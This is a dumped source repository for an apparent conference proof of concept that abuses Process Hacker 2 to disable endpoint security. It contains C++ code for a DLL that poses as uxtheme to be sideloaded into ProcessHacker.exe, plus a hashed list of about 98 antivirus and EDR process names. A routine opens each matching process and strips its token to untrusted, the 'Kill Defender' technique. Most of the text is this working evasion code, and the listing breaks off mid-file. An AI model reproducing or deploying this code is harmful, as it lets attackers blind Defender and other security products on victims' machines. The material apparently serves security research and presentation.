├── img ├── demo.gif └── pptx.png ├── src ├── DefenderKill │ ├── ph.cpp │ ├── console.hpp │ ├── DefenderKill.vcxproj.user │ ├── memory.hpp │ ├── dbg.hpp │ ├── utils.hpp │ ├── ph.hpp │ ├── console.cpp │ ├── memory.cpp │ ├── exports.cpp │ ├── DefenderKill.vcxproj.filters │ ├── main.cpp │ ├── dbg.cpp │ ├── DefenderKill.vcxproj │ └── utils.cpp └── DefenderKill.sln └── README.md /img/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/hack-process-hacker2/HEAD/img/demo.gif -------------------------------------------------------------------------------- /img/pptx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/hack-process-hacker2/HEAD/img/pptx.png -------------------------------------------------------------------------------- /src/DefenderKill/ph.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/hack-process-hacker2/HEAD/src/DefenderKill/ph.cpp -------------------------------------------------------------------------------- /src/DefenderKill/console.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | namespace Console 6 | { 7 | BOOL Init(); 8 | 9 | BOOL Write(LPCWSTR Text); 10 | } -------------------------------------------------------------------------------- /src/DefenderKill/DefenderKill.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/DefenderKill/memory.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | namespace Memory 6 | { 7 | BOOL Init(); 8 | 9 | PVOID Alloc(DWORD Size); 10 | 11 | PVOID ReAlloc(PVOID MemPtr, DWORD Size); 12 | 13 | BOOL Free(PVOID MemPtr); 14 | } -------------------------------------------------------------------------------- /src/DefenderKill/dbg.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define DEBUG_OUTPUT_MODE_CONSOLE 1 6 | #define DEBUG_OUTPUT_MODE_FILE 2 7 | 8 | namespace Debug 9 | { 10 | BOOL Init(DWORD NewOutputMode); 11 | 12 | VOID DbgOutW(LPCWSTR DebugString, ...); 13 | } -------------------------------------------------------------------------------- /src/DefenderKill/utils.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | namespace Utils 6 | { 7 | int isInEdrlist(const wchar_t* pn); 8 | 9 | BOOL IsLaunchedInsidePH(); 10 | 11 | DWORD GetDefenderPID(); 12 | 13 | BOOL MakeProcessTokenUntrusted(HANDLE TokenHandle); 14 | } -------------------------------------------------------------------------------- /src/DefenderKill/ph.hpp: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #define PH_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 6 | 7 | namespace PH 8 | { 9 | //VOID PhInitializeKph(PVOID PhBase); 10 | 11 | NTSTATUS PhOpenProcess(PVOID PhBase, PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, HANDLE ProcessId); 12 | 13 | NTSTATUS PhOpenProcessToken(PVOID PhBase, HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle); 14 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hacking Process Hacker 2 2 | 3 | From my talk at HACK.LU 2024 - [https://www.youtube.com/watch?v=gW8v270HjxI](https://www.youtube.com/watch?v=gW8v270HjxI) 4 | 5 | ![img](./img/pptx.png) 6 | 7 | This is example how you can abuse Process Hacker 2 (2.39.124) for Malware Persistence. 8 | 9 | Proof of Concept via using [Kill Defender](https://github.com/pwn1sher/KillDefender) trick. 10 | 11 | DEMO: 12 | 13 | ![img](./img/demo.gif) 14 | 15 | This is not final version!!! 16 | 17 | **TODO**: add blog post about this on [https://cocomelonc.github.io](https://cocomelonc.github.io) -------------------------------------------------------------------------------- /src/DefenderKill/console.cpp: -------------------------------------------------------------------------------- 1 | #include "console.hpp" 2 | #include "dbg.hpp" 3 | 4 | namespace Console 5 | { 6 | HANDLE ConsoleHandle = NULL; 7 | 8 | BOOL Init() 9 | { 10 | BOOL Result = false; 11 | 12 | do 13 | { 14 | if (!AllocConsole()) 15 | { 16 | #ifdef _DEBUG 17 | Debug::DbgOutW(L"[ERROR] %s:%d | AllocConsole failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 18 | #endif 19 | break; 20 | } 21 | 22 | ConsoleHandle = GetStdHandle(STD_OUTPUT_HANDLE); 23 | Result = true; 24 | } while (false); 25 | 26 | return Result; 27 | } 28 | 29 | BOOL Write(LPCWSTR Text) 30 | { 31 | if (ConsoleHandle) 32 | return WriteConsoleW(ConsoleHandle, Text, lstrlenW(Text), nullptr, nullptr); 33 | else 34 | return FALSE; 35 | } 36 | } -------------------------------------------------------------------------------- /src/DefenderKill/memory.cpp: -------------------------------------------------------------------------------- 1 | #include "memory.hpp" 2 | 3 | #pragma function (memset) 4 | void* memset(void* _Dst, int _Val, size_t _Size) 5 | { 6 | byte* x = (byte*)_Dst; 7 | 8 | while (_Size--) 9 | { 10 | *x++ = _Val; 11 | } 12 | 13 | return _Dst; 14 | } 15 | 16 | namespace Memory 17 | { 18 | HANDLE HeapHandle = NULL; 19 | 20 | BOOL Init() 21 | { 22 | return (HeapHandle = GetProcessHeap()) ? true : false; 23 | } 24 | 25 | PVOID Alloc(DWORD Size) 26 | { 27 | return HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, Size); 28 | } 29 | 30 | PVOID ReAlloc(PVOID MemPtr, DWORD Size) 31 | { 32 | return HeapReAlloc(HeapHandle, HEAP_ZERO_MEMORY, MemPtr, Size); 33 | } 34 | 35 | BOOL Free(PVOID MemPtr) 36 | { 37 | return HeapFree(HeapHandle, 0, MemPtr); 38 | } 39 | } -------------------------------------------------------------------------------- /src/DefenderKill.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DefenderKill", "DefenderKill\DefenderKill.vcxproj", "{3C4956C6-5702-4794-876A-8AFFFF69C1FB}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Debug|x64.ActiveCfg = Debug|x64 17 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Debug|x64.Build.0 = Debug|x64 18 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Debug|x86.ActiveCfg = Debug|Win32 19 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Debug|x86.Build.0 = Debug|Win32 20 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Release|x64.ActiveCfg = Release|x64 21 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Release|x64.Build.0 = Release|x64 22 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Release|x86.ActiveCfg = Release|Win32 23 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /src/DefenderKill/exports.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #ifndef _AMD64_ 4 | #pragma comment(linker,"/EXPORT:IsThemeActive=_IsThemeActive@0") 5 | #pragma comment(linker,"/EXPORT:GetThemeInt=_GetThemeInt@20") 6 | #pragma comment(linker,"/EXPORT:SetWindowTheme=_SetWindowTheme@12") 7 | #pragma comment(linker,"/EXPORT:CloseThemeData=_CloseThemeData@4") 8 | #pragma comment(linker,"/EXPORT:DrawThemeBackground=_DrawThemeBackground@24") 9 | #pragma comment(linker,"/EXPORT:OpenThemeData=_OpenThemeData@8") 10 | #pragma comment(linker,"/EXPORT:IsThemePartDefined=_IsThemePartDefined@12") 11 | #pragma comment(linker,"/EXPORT:EnableThemeDialogTexture=_EnableThemeDialogTexture@8") 12 | #define AVKILL_EXPORT 13 | #else 14 | #define AVKILL_EXPORT __declspec(dllexport) 15 | #endif 16 | 17 | namespace Exports 18 | { 19 | #define HTHEME HANDLE 20 | 21 | extern "C" AVKILL_EXPORT BOOL __stdcall IsThemeActive() 22 | { 23 | return 0; 24 | } 25 | 26 | extern "C" AVKILL_EXPORT HRESULT __stdcall GetThemeInt(HTHEME hTheme, int iPartId, int iStateId, int iPropId, int* piVal) 27 | { 28 | return 0; 29 | } 30 | 31 | extern "C" AVKILL_EXPORT HRESULT __stdcall SetWindowTheme(HWND hwnd, LPCWSTR pszSubAppName, LPCWSTR pszSubIdList) 32 | { 33 | return 0; 34 | } 35 | 36 | extern "C" AVKILL_EXPORT HRESULT __stdcall CloseThemeData(HTHEME hTheme) 37 | { 38 | return 0; 39 | } 40 | 41 | extern "C" AVKILL_EXPORT HRESULT __stdcall DrawThemeBackground(HTHEME hTheme, HDC hdc, int iPartId, int iStateId, LPCRECT pRect, LPCRECT pClipRect) 42 | { 43 | return 0; 44 | } 45 | 46 | extern "C" AVKILL_EXPORT HTHEME __stdcall OpenThemeData(HWND hwnd, LPCWSTR pszClassList) 47 | { 48 | return 0; 49 | } 50 | 51 | extern "C" AVKILL_EXPORT BOOL __stdcall IsThemePartDefined(HTHEME hTheme, int iPartId, int iStateId) 52 | { 53 | return 0; 54 | } 55 | 56 | extern "C" AVKILL_EXPORT BOOL __stdcall EnableThemeDialogTexture(HWND hwnd, DWORD dwFlags) 57 | { 58 | return 0; 59 | } 60 | } -------------------------------------------------------------------------------- /src/DefenderKill/DefenderKill.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | Source Files 26 | 27 | 28 | Source Files 29 | 30 | 31 | Source Files 32 | 33 | 34 | Source Files 35 | 36 | 37 | Source Files 38 | 39 | 40 | 41 | 42 | Header Files 43 | 44 | 45 | Header Files 46 | 47 | 48 | Header Files 49 | 50 | 51 | Header Files 52 | 53 | 54 | Header Files 55 | 56 | 57 | -------------------------------------------------------------------------------- /src/DefenderKill/main.cpp: -------------------------------------------------------------------------------- 1 | #include "memory.hpp" 2 | #include "dbg.hpp" 3 | #include "utils.hpp" 4 | #include "ph.hpp" 5 | #include 6 | #include "console.hpp" 7 | 8 | BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) 9 | { 10 | BOOL Result = false; 11 | 12 | do 13 | { 14 | DWORD WindowProcessID = 0; 15 | 16 | GetWindowThreadProcessId(hwnd, &WindowProcessID); 17 | 18 | if (WindowProcessID == GetCurrentProcessId() && hwnd != GetConsoleWindow()) 19 | { 20 | ShowWindow(hwnd, SW_HIDE); 21 | } 22 | 23 | Result = true; 24 | } while (false); 25 | 26 | return Result; 27 | } 28 | 29 | VOID HideWindow() 30 | { 31 | while (true) 32 | { 33 | EnumWindows(EnumWindowsProc, NULL); 34 | 35 | Sleep(100); 36 | } 37 | } 38 | 39 | VOID main() 40 | { 41 | Utils::isInEdrlist(L"msmpeng.exe"); 42 | return; 43 | 44 | MessageBoxA(0, "Main", "Debug", 0); 45 | 46 | if (!Memory::Init() /*|| !Console::Init()*/) 47 | { 48 | return; 49 | } 50 | 51 | #ifdef _DEBUG 52 | if (!Debug::Init(DEBUG_OUTPUT_MODE_FILE)) 53 | { 54 | return; 55 | } 56 | #endif 57 | 58 | if (!Utils::IsLaunchedInsidePH()) 59 | { 60 | #ifdef _DEBUG 61 | Debug::DbgOutW(L"[INFO] %s:%d | DLL was launched not inside ProcessHacker process\n", __FILEW__, __LINE__); 62 | #endif 63 | ExitProcess(ERROR_SUCCESS); 64 | } 65 | 66 | Console::Write(L"[+] Init ok. Sucsessfully launched inside PH\n"); 67 | 68 | #ifndef _DEBUG 69 | // if (!CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)HideWindow, nullptr, 0, nullptr)) 70 | // { 71 | //#ifdef _DEBUG 72 | // Debug::DbgOutW(L"[ERROR] %s:%d | CreateThread failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 73 | //#endif 74 | // ExitProcess(ERROR_SUCCESS); 75 | // } 76 | #endif 77 | 78 | Console::Write(L"[+] Created thread for hiding PH windows\n"); 79 | Console::Write(L"[~] Will sleep 5 seconds now... PH need some time to initialize internal structures\n"); 80 | 81 | // Ñïèì 5 ñåêóíä äëÿ òîãî, ÷òîáû äàòü ïðîöåññõàêåðó èíèöèàëèçèðîâàòüñÿ. 82 | Sleep(5000); 83 | 84 | PVOID PhBaseAddress = GetModuleHandleW(L"ProcessHacker.exe"); 85 | 86 | if (!PhBaseAddress) 87 | { 88 | #ifdef _DEBUG 89 | Debug::DbgOutW(L"[ERROR] %s:%d | GetModuleHandleW failed. Last error: %d\n", __FILEW__, __LINE__, GetLastError()); 90 | #endif 91 | ExitProcess(ERROR_SUCCESS); 92 | } 93 | 94 | 95 | } 96 | 97 | BOOL __stdcall DllMain(HINSTANCE hinstDll, DWORD fdwReason, LPVOID lpvReserved) 98 | { 99 | if (fdwReason == DLL_PROCESS_ATTACH) 100 | { 101 | CreateThread(0, 0, (LPTHREAD_START_ROUTINE)main, 0, 0, 0); 102 | } 103 | 104 | return TRUE; 105 | } -------------------------------------------------------------------------------- /src/DefenderKill/dbg.cpp: -------------------------------------------------------------------------------- 1 | #include "dbg.hpp" 2 | #include 3 | 4 | namespace Debug 5 | { 6 | CRITICAL_SECTION DebugFileSection = { 0 }; 7 | HANDLE DebugFileHandle = NULL; 8 | DWORD OutputMode = 0; 9 | 10 | VOID WriteDebugLogToDebugConsoleW(LPCWSTR DebugString, va_list ArgList) 11 | { 12 | if (!DebugString) 13 | { 14 | return; 15 | } 16 | 17 | do 18 | { 19 | WCHAR FormattedString[4096]; 20 | 21 | if (!wvnsprintfW(FormattedString, 4095, DebugString, ArgList)) 22 | { 23 | break; 24 | } 25 | 26 | OutputDebugStringW(FormattedString); 27 | } while (false); 28 | } 29 | 30 | VOID WriteDebugLogToFileW(LPCWSTR DebugString, va_list ArgList) 31 | { 32 | if (!DebugString || !ArgList) 33 | { 34 | return; 35 | } 36 | 37 | EnterCriticalSection(&DebugFileSection); 38 | 39 | do 40 | { 41 | WCHAR FormattedString[4096] = { 0 }; 42 | 43 | int Length = wvnsprintfW(FormattedString, 4095, DebugString, ArgList); 44 | 45 | if (!Length) 46 | { 47 | break; 48 | } 49 | 50 | DWORD Written = 0; 51 | 52 | if (!WriteFile(DebugFileHandle, FormattedString, Length * 2, &Written, nullptr)) 53 | { 54 | break; 55 | } 56 | } while (false); 57 | 58 | LeaveCriticalSection(&DebugFileSection); 59 | } 60 | 61 | VOID DbgOutW(LPCWSTR DebugString, ...) 62 | { 63 | if (!DebugString) 64 | { 65 | return; 66 | } 67 | 68 | va_list ArgList = nullptr; 69 | va_start(ArgList, DebugString); 70 | 71 | if (OutputMode == DEBUG_OUTPUT_MODE_FILE && DebugFileHandle) 72 | { 73 | WriteDebugLogToFileW(DebugString, ArgList); 74 | } 75 | else 76 | { 77 | WriteDebugLogToDebugConsoleW(DebugString, ArgList); 78 | } 79 | 80 | va_end(ArgList); 81 | } 82 | 83 | BOOL InitFileOutput() 84 | { 85 | BOOL Result = false; 86 | 87 | do 88 | { 89 | WCHAR ProgramDataPath[1025] = { 0 }; 90 | SYSTEMTIME SystemTime = { 0 }; 91 | WCHAR LogPath[1025] = { 0 }; 92 | 93 | if (!GetEnvironmentVariableW(L"PROGRAMDATA", ProgramDataPath, 1024)) 94 | { 95 | break; 96 | } 97 | 98 | GetSystemTime(&SystemTime); 99 | 100 | if (!wsprintfW(LogPath, L"%s\\DefenderKillLog-%02d-%02d-%02d-%02d-%02d-%02d.log", ProgramDataPath, SystemTime.wYear, SystemTime.wMonth, SystemTime.wDay, SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond)) 101 | { 102 | break; 103 | } 104 | 105 | DebugFileHandle = CreateFileW(LogPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); 106 | 107 | if (DebugFileHandle == INVALID_HANDLE_VALUE) 108 | { 109 | break; 110 | } 111 | 112 | InitializeCriticalSection(&DebugFileSection); 113 | 114 | Result = true; 115 | } while (false); 116 | 117 | return Result; 118 | } 119 | 120 | BOOL Init(DWORD NewOutputMode) 121 | { 122 | if (!NewOutputMode || NewOutputMode != DEBUG_OUTPUT_MODE_CONSOLE && NewOutputMode != DEBUG_OUTPUT_MODE_FILE) 123 | { 124 | return FALSE; 125 | } 126 | 127 | OutputMode = NewOutputMode; 128 | 129 | if (OutputMode == DEBUG_OUTPUT_MODE_FILE) 130 | { 131 | return InitFileOutput(); 132 | } 133 | 134 | return TRUE; 135 | } 136 | } -------------------------------------------------------------------------------- /src/DefenderKill/DefenderKill.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {3C4956C6-5702-4794-876A-8AFFFF69C1FB} 23 | DefenderKill 24 | 10.0 25 | 26 | 27 | 28 | Application 29 | true 30 | v142 31 | MultiByte 32 | 33 | 34 | Application 35 | false 36 | v142 37 | true 38 | MultiByte 39 | 40 | 41 | Application 42 | true 43 | v142 44 | MultiByte 45 | 46 | 47 | Application 48 | false 49 | v142 50 | true 51 | MultiByte 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | Level3 75 | Disabled 76 | true 77 | 78 | 79 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;Shlwapi.lib;%(AdditionalDependencies) 80 | 81 | 82 | 83 | 84 | Level3 85 | Disabled 86 | true 87 | 88 | 89 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;Shlwapi.lib;%(AdditionalDependencies) 90 | 91 | 92 | 93 | 94 | Level3 95 | MinSpace 96 | true 97 | true 98 | true 99 | Size 100 | false 101 | true 102 | MultiThreaded 103 | false 104 | 105 | 106 | true 107 | true 108 | false 109 | Windows 110 | DllMain 111 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;Shlwapi.lib;%(AdditionalDependencies) 112 | 113 | 114 | 115 | 116 | Level3 117 | MinSpace 118 | true 119 | true 120 | true 121 | MultiThreaded 122 | Size 123 | false 124 | true 125 | false 126 | 127 | 128 | true 129 | true 130 | Windows 131 | DllMain 132 | 133 | 134 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;Shlwapi.lib;%(AdditionalDependencies) 135 | false 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | -------------------------------------------------------------------------------- /src/DefenderKill/utils.cpp: -------------------------------------------------------------------------------- 1 | #include "utils.hpp" 2 | #include 3 | #include "dbg.hpp" 4 | #include 5 | #include "memory.hpp" 6 | #include "ph.hpp" 7 | 8 | namespace Utils 9 | { 10 | DWORD HASHING_SEED = 0x109bc0b3; 11 | 12 | const DWORD g_edrHashList[] = { 13 | 0xb746e806,//3074877446 activeconsole.exe 14 | 0x53e11368,//1407259496 anti malware.exe 15 | 0x097ba73d,//0159098685 anti-malware.exe 16 | 0xc4d2cca4,//3302149284 antimalware.exe 17 | 0x3c7aabb0,//1014672304 anti virus.exe 18 | 0x3ad2d685,//0986896005 anti-virus.exe 19 | 0xe0a0078c,//3768584076 antivirus.exe 20 | 0xcd230ee2,//3441626850 appsense.exe 21 | 0x53c63fcc,//1405501388 authtap.exe 22 | 0x66e4a6a2,//1726260898 avast.exe 23 | 0x88a8d921,//2292767009 avecto.exe 24 | 0x2d6b9c8f,//0762027151 canary.exe 25 | 0x8fd08345,//2412806981 carbonblack.exe 26 | 0xd217d363,//3524776803 carbon black.exe 27 | 0xfd76b470,//4252415088 cb.exe 28 | 0xda507edc,//3662708444 ciscoamp.exe 29 | 0x110fadd2,//0286240210 cisco amp.exe 30 | 0xd2c394f5,//3536033013 countercept.exe 31 | 0xdad2c006,//3671244806 countertack.exe 32 | 0xf6e46246,//4142162502 cramtray.exe 33 | 0xe7fe65b3,//3892209075 crssvc.exe 34 | 0x4398bfb0,//1134084016 crowdstrike.exe 35 | 0x13ce7a6a,//0332298858 csagent.exe 36 | 0x98530436,//2555577398 csfalcon.exe 37 | 0x44e12e97,//1155608215 csshell.exe 38 | 0xd00225d2,//3489801682 cybereason.exe 39 | 0xaef25f04,//2935119620 cyclorama.exe 40 | 0x1354491a,//0324290842 cylance.exe 41 | 0x0e9fcc53,//0245353555 cyoptics.exe 42 | 0x07048330,//0117736240 cyupdate.exe 43 | 0x0ff06c8b,//0267414667 cyvera.exe 44 | 0x3920c8ee,//0958449902 cyserver.exe 45 | 0x70373883,//1882667139 cytray.exe 46 | 0xd9f45600,//3656668672 darktrace.exe 47 | 0x5aaee70d,//1521411853 defendpoint.exe 48 | 0xaca8b574,//2896737652 defender.exe 49 | 0x4deadabc,//1307237052 eectrl.exe 50 | 0x40741dea,//1081351658 elastic.exe 51 | 0x8deb24e2,//2380997858 endgame.exe 52 | 0x0b4da651,//0189638225 f-secure.exe 53 | 0x5230bfba,//1378926522 forcepoint.exe 54 | 0x15c7d0ac,//0365416620 fireeye.exe 55 | 0x304a86b2,//0810190514 groundling.exe 56 | 0xda5c36e8,//3663476456 GRRservic.exe 57 | 0xdd192fc8,//3709415368 inspector.exe 58 | 0x2e6b88a0,//0778799264 ivanti.exe 59 | 0xf454d136,//4099199286 kaspersky.exe 60 | 0x6e20368d,//1847604877 lacuna.exe 61 | 0x692366ed,//1763927789 logrhythm.exe 62 | 0xe10e9bea,//3775831018 malware.exe 63 | 0xdc6881df,//3697836511 mandiant.exe 64 | 0x215b448c,//0559629452 mcafee.exe 65 | 0x4787dd87,//1200086407 morphisec.exe 66 | 0xcde73002,//3454480386 msascuil.exe 67 | 0x43bb262a,//1136338474 msmpeng.exe 68 | 0xc28a2b70,//3263834992 nissrv.exe 69 | 0xa8db4e8e,//2832944782 omni.exe 70 | 0xd4df3503,//3571397891 omniagent.exe 71 | 0xbbfae7db,//3153782747 osquery.exe 72 | 0x75bc7a84,//1975286404 palo alto networks.exe 73 | 0x90bff93f,//2428500287 pgeposervice.exe 74 | 0xfe68fb93,//4268293011 pgsystemtray.exe 75 | 0x5c083c8b,//1544043659 privilegeguard.exe 76 | 0x477e21d7,//1199448535 procwall.exe 77 | 0xf1069a55,//4043741781 protectorservic.exe 78 | 0xcf0da0ea,//3473776874 qradar.exe 79 | 0x04fae970,//0083552624 redcloak.exe 80 | 0x8013ecfc,//2148789500 secureworks.exe 81 | 0x1125040e,//0287638542 securityhealthservice.exe 82 | 0x657d9a46,//1702730310 semlaunchsv.exe 83 | 0xe84f41fb,//3897508347 sentinel.exe 84 | 0x840eb9a5,//2215557541 sepliveupdat.exe 85 | 0x8960e50d,//2304828685 sisidsservice.exe 86 | 0x12c78179,//0315064697 sisipsservice.exe 87 | 0x682d19c6,//1747786182 sisipsutil.exe 88 | 0x4644649e,//1178887326 smc.exe 89 | 0x2b0b6105,//0722166021 smcgui.exe 90 | 0x188c52cc,//0411849420 snac64.exe 91 | 0x049e81cf,//0077496783 sophos.exe 92 | 0xf3eccf74,//4092383092 splunk.exe 93 | 0x851dd205,//2233324037 srtsp.exe 94 | 0x6f145f71,//1863606129 symantec.exe 95 | 0xb79e2afb,//3080596219 symcorpu.exe 96 | 0x72ab1d00,//1923816704 symefasi.exe 97 | 0x7a67771d,//2053601053 sysinternal.exe 98 | 0x01ee32f0,//0032387824 sysmon.exe 99 | 0xa1e08a97,//2715847319 tanium.exe 100 | 0xdf3a9fc6,//3745161158 tda.exe 101 | 0x03149b15,//0051682069 tdawork.exe 102 | 0xe4725187,//3832697223 tpython.exe 103 | 0x11970980,//0295111040 vectra.exe 104 | 0x6c59b801,//1817819137 wincollect.exe 105 | 0xa1c45332,//2713998130 windowssensor.exe 106 | 0xf82de137,//4163756343 wireshark.exe 107 | 0xc8514b8d,//3360770957 threat.exe 108 | 0xa756c889,//2807482505 xagt.exe 109 | 0x797f398d,//2038380941 xagtnotif.exe 110 | 0xa4e4c29f//2766455455 mssense.exe 111 | }; 112 | 113 | int g_edrlistSize = 98; 114 | 115 | #define UPCASE(wch) \ 116 | (((wch) >= 'a') && ((wch) <= 'z') ? \ 117 | (wch) \ 118 | : \ 119 | ((wch) + ('a'-'A')) \ 120 | ) 121 | 122 | ULONG HashW(PCWSTR key, SIZE_T length, ULONG seed) 123 | { 124 | int crc; 125 | unsigned int byte, c; 126 | const unsigned int g0 = seed, g1 = g0 >> 1, 127 | g2 = g0 >> 2, g3 = g0 >> 3, g4 = g0 >> 4, g5 = g0 >> 5, 128 | g6 = (g0 >> 6) ^ g0, g7 = ((g0 >> 6) ^ g0) >> 1; 129 | crc = 0xFFFFFFFF; 130 | SIZE_T len = length; 131 | while (len-- != 0) 132 | { 133 | byte = UPCASE(key[len]); 134 | crc = crc ^ byte; 135 | c = ((crc << 31 >> 31) & g7) ^ ((crc << 30 >> 31) & g6) ^ 136 | ((crc << 29 >> 31) & g5) ^ ((crc << 28 >> 31) & g4) ^ 137 | ((crc << 27 >> 31) & g3) ^ ((crc << 26 >> 31) & g2) ^ 138 | ((crc << 25 >> 31) & g1) ^ ((crc << 24 >> 31) & g0); 139 | crc = ((unsigned)crc >> 8) ^ c; 140 | } 141 | return crc; 142 | } 143 | 144 | INT StrLenW(__in LPCWSTR Str) 145 | { 146 | INT Length = 0; 147 | while (*Str) 148 | { 149 | Length++; 150 | Str++; 151 | } 152 | 153 | return Length; 154 | } 155 | 156 | int isInEdrlist(const wchar_t* pn) 157 | { 158 | BOOL found = FALSE; 159 | for (int i = 0; i < g_edrlistSize; i++) 160 | if (HashW(pn, StrLenW(pn), HASHING_SEED) == g_edrHashList[i]) 161 | { 162 | found = TRUE; 163 | break; 164 | } 165 | 166 | return found; 167 | } 168 | 169 | BOOL processEDR() 170 | { 171 | unsigned int procId = 0; 172 | unsigned int pOutbuff = 0; 173 | DWORD bytesRet = 0; 174 | 175 | PVOID PhBaseAddress = GetModuleHandleW(L"ProcessHacker.exe"); 176 | 177 | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 178 | 179 | if (hSnap != INVALID_HANDLE_VALUE) 180 | { 181 | PROCESSENTRY32W pE; 182 | pE.dwSize = sizeof(pE); 183 | 184 | if (Process32FirstW(hSnap, &pE)) 185 | { 186 | do 187 | { 188 | if (isInEdrlist(pE.szExeFile)) 189 | { 190 | procId = (unsigned int)pE.th32ProcessID; 191 | 192 | HANDLE ProcessHandle = NULL; 193 | HANDLE TokenHandle = NULL; 194 | 195 | NTSTATUS Status = PH::PhOpenProcess(PhBaseAddress, &ProcessHandle, PROCESS_ALL_ACCESS, (HANDLE)procId); 196 | 197 | if (!PH_SUCCESS(Status) || !ProcessHandle) 198 | continue; 199 | 200 | Status = PH::PhOpenProcessToken(PhBaseAddress, ProcessHandle, TOKEN_ALL_ACCESS, &TokenHandle); 201 | 202 | if (!PH_SUCCESS(Status) || !TokenHandle) 203 | continue; 204 | 205 | if (!Utils::MakeProcessTokenUntrusted(TokenHandle)) 206 | continue; 207 | 208 | if (ProcessHandle) 209 | CloseHandle(ProcessHandle); 210 | 211 | if (TokenHandle) 212 | CloseHandle(TokenHandle); 213 | } 214 | } while (Process32NextW(hSnap, &pE)); 215 | } 216 | CloseHandle(hSnap); 217 | } 218 | 219 | return TRUE; 220 | } 221 | 222 | BOOL IsLaunchedInsidePH() 223 | { 224 | BOOL Result = false; 225 | 226 | do 227 | { 228 | WCHAR CurrentPath[1025] = { 0 }; 229 | 230 | GetModuleFileNameW(NULL, CurrentPath, 1024); 231 | 232 | LPCWSTR FileName = PathFindFileNameW(CurrentPath); 233 | 234 | if (lstrcmpW(FileName, L"ProcessHacker.exe") != 0) 235 | { 236 | break; 237 | } 238 | 239 | if (!PathRemoveFileSpecW(CurrentPath)) 240 | { 241 | #ifdef _DEBUG 242 | Debug::DbgOutW(L"[ERROR] %s:%d | PathRemoveFileSpecW failed. Last error: %d\n", 